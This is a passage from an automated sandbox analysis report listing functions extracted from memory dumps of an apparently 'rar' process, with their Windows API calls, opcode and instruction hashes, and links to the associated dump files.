                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                      • Instruction ID: 0c1b55147ec7c2f8d1211767fdd5718bdfbdcf1776c4c217e724078753035f66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 713124A3A1864146E7308F28E4053B976E0EB62F79F1043B4DEAC876C5DF7CC4858740
                                                                                                                                                                                                                                      Function 00007FF69A41915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f0c7fbb111e56d36465e4d818618f2f1e76dda2c5551dac30fb367d58ac609c7
                                                                                                                                                                                                                                      • Instruction ID: 42dd1cb871c97f502d7c48e59103f686977d0225ca358a3583df8bb143d037f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0c7fbb111e56d36465e4d818618f2f1e76dda2c5551dac30fb367d58ac609c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C11B932609B8141EB24DB64E5003B9B2D4EFA4B94F2406B8D6DD8B7E6DF7DD051C300
                                                                                                                                                                                                                                      Function 00007FF69A4020B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                      • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                      • Instruction ID: 210436290e70db0fa437ed2b6e486d49f64cd7bbb50f911181c23904d7df7023
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501E525A196A542EBB48B26A44002972E1EF75FE0F1452F0DF6DC7BD4CF3CE441A700
                                                                                                                                                                                                                                      Function 00007FF69A3F7A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF69A3F7A7B
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A442AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A447EF3
                                                                                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF69A3F7A8F
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3F7B44: GetStdHandle.KERNEL32(?,?,?,00007FF69A3F7A9E), ref: 00007FF69A3F7B4A
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3F7B44: GetFileType.KERNELBASE(?,?,?,00007FF69A3F7A9E), ref: 00007FF69A3F7B56
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3F7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF69A3F7A9E), ref: 00007FF69A3F7B69
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A442ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A442AD0
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A442B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A442C1C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4044681568-0
                                                                                                                                                                                                                                      • Opcode ID: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                      • Instruction ID: fb6de92daec00ae464be511cffee08c5e7882104c8d000ddf1c2bfd23aa3c11e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA01D300E1928306FAB8BB7554A27BA34D2CF92B11F4052FCE52ECB3D3CD5D28019391
                                                                                                                                                                                                                                      Function 00007FF69A402440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                      • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                      • Instruction ID: 9e1af4bb90d5b1083616bf070d0e9776cd9ba6fb8f1b53be3cb079f2d8c0b2c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41016D21A1868292EBB49B39E44427833A0EB54BB8F2443F5E23D821E5CF3CD586D700
                                                                                                                                                                                                                                      Function 00007FF69A4030C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000800,00007FF69A40305D,?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800), ref: 00007FF69A4030F0
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF69A403119
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                      • Instruction ID: 489df78f808f76e8f7477fc3249210797cd69190062ed6f90b4fe0ced6604dae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57F0AF21B18A8145EB70DB25F5443A972E0FB9DBD4F4001B0EADCC7799CE6DD5848B00
                                                                                                                                                                                                                                      Function 00007FF69A42B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1175261203-0
                                                                                                                                                                                                                                      • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                      • Instruction ID: 290c52d22cecdc2dc7f0bee668d73adb8ecbe21d41d222c4c6486d5250400bee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F09662B1858146F6709B21E8553F673E4FF9CB84F8000B1E9CDC3699DE2CD6458B40
                                                                                                                                                                                                                                      Function 00007FF69A42BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1231390398-0
                                                                                                                                                                                                                                      • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                      • Instruction ID: 44afb80263f8623edd6fbd049d76253e8728ca6319e4e79f6ae575623b2c1adb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89E09261B3459186DBF89B59D496FA933D0EF95F80F8070B9F80BC3A54EE2DD5468B00
                                                                                                                                                                                                                                      Function 00007FF69A444A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                      • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                      • Instruction ID: 499bf5fcb7715c24f3b84dce353746fcf775606ad257c72640c1afde8672cdad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E08C60E1964383FF38AFF2A80517432D0EF89F40F1450F0D90DD7292EE2CA4918384
                                                                                                                                                                                                                                      Function 00007FF69A4271FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c7c6451250f1d92b445fd7dccdbfbb717c39f23b8886fb790192c1d858181173
                                                                                                                                                                                                                                      • Instruction ID: 125c06ea0e78536c005cc6ca3606376c190ccd52b48c43026827d40506d69c88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7c6451250f1d92b445fd7dccdbfbb717c39f23b8886fb790192c1d858181173
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE1DE22A0868282FB309E2594543BE77E1EF51F98F0841F5DE4DCB7DADE2DA466C710
                                                                                                                                                                                                                                      Function 00007FF69A3E72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
                                                                                                                                                                                                                                      • Instruction ID: 58e456d1d029c4bba9b7b34f4c4cf97547d96cb2435204d49bbd8569f8ad1818
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25512673528BD295E7109F64E8441ED37A8F744F88F58427AEE884B79ADF389062C331
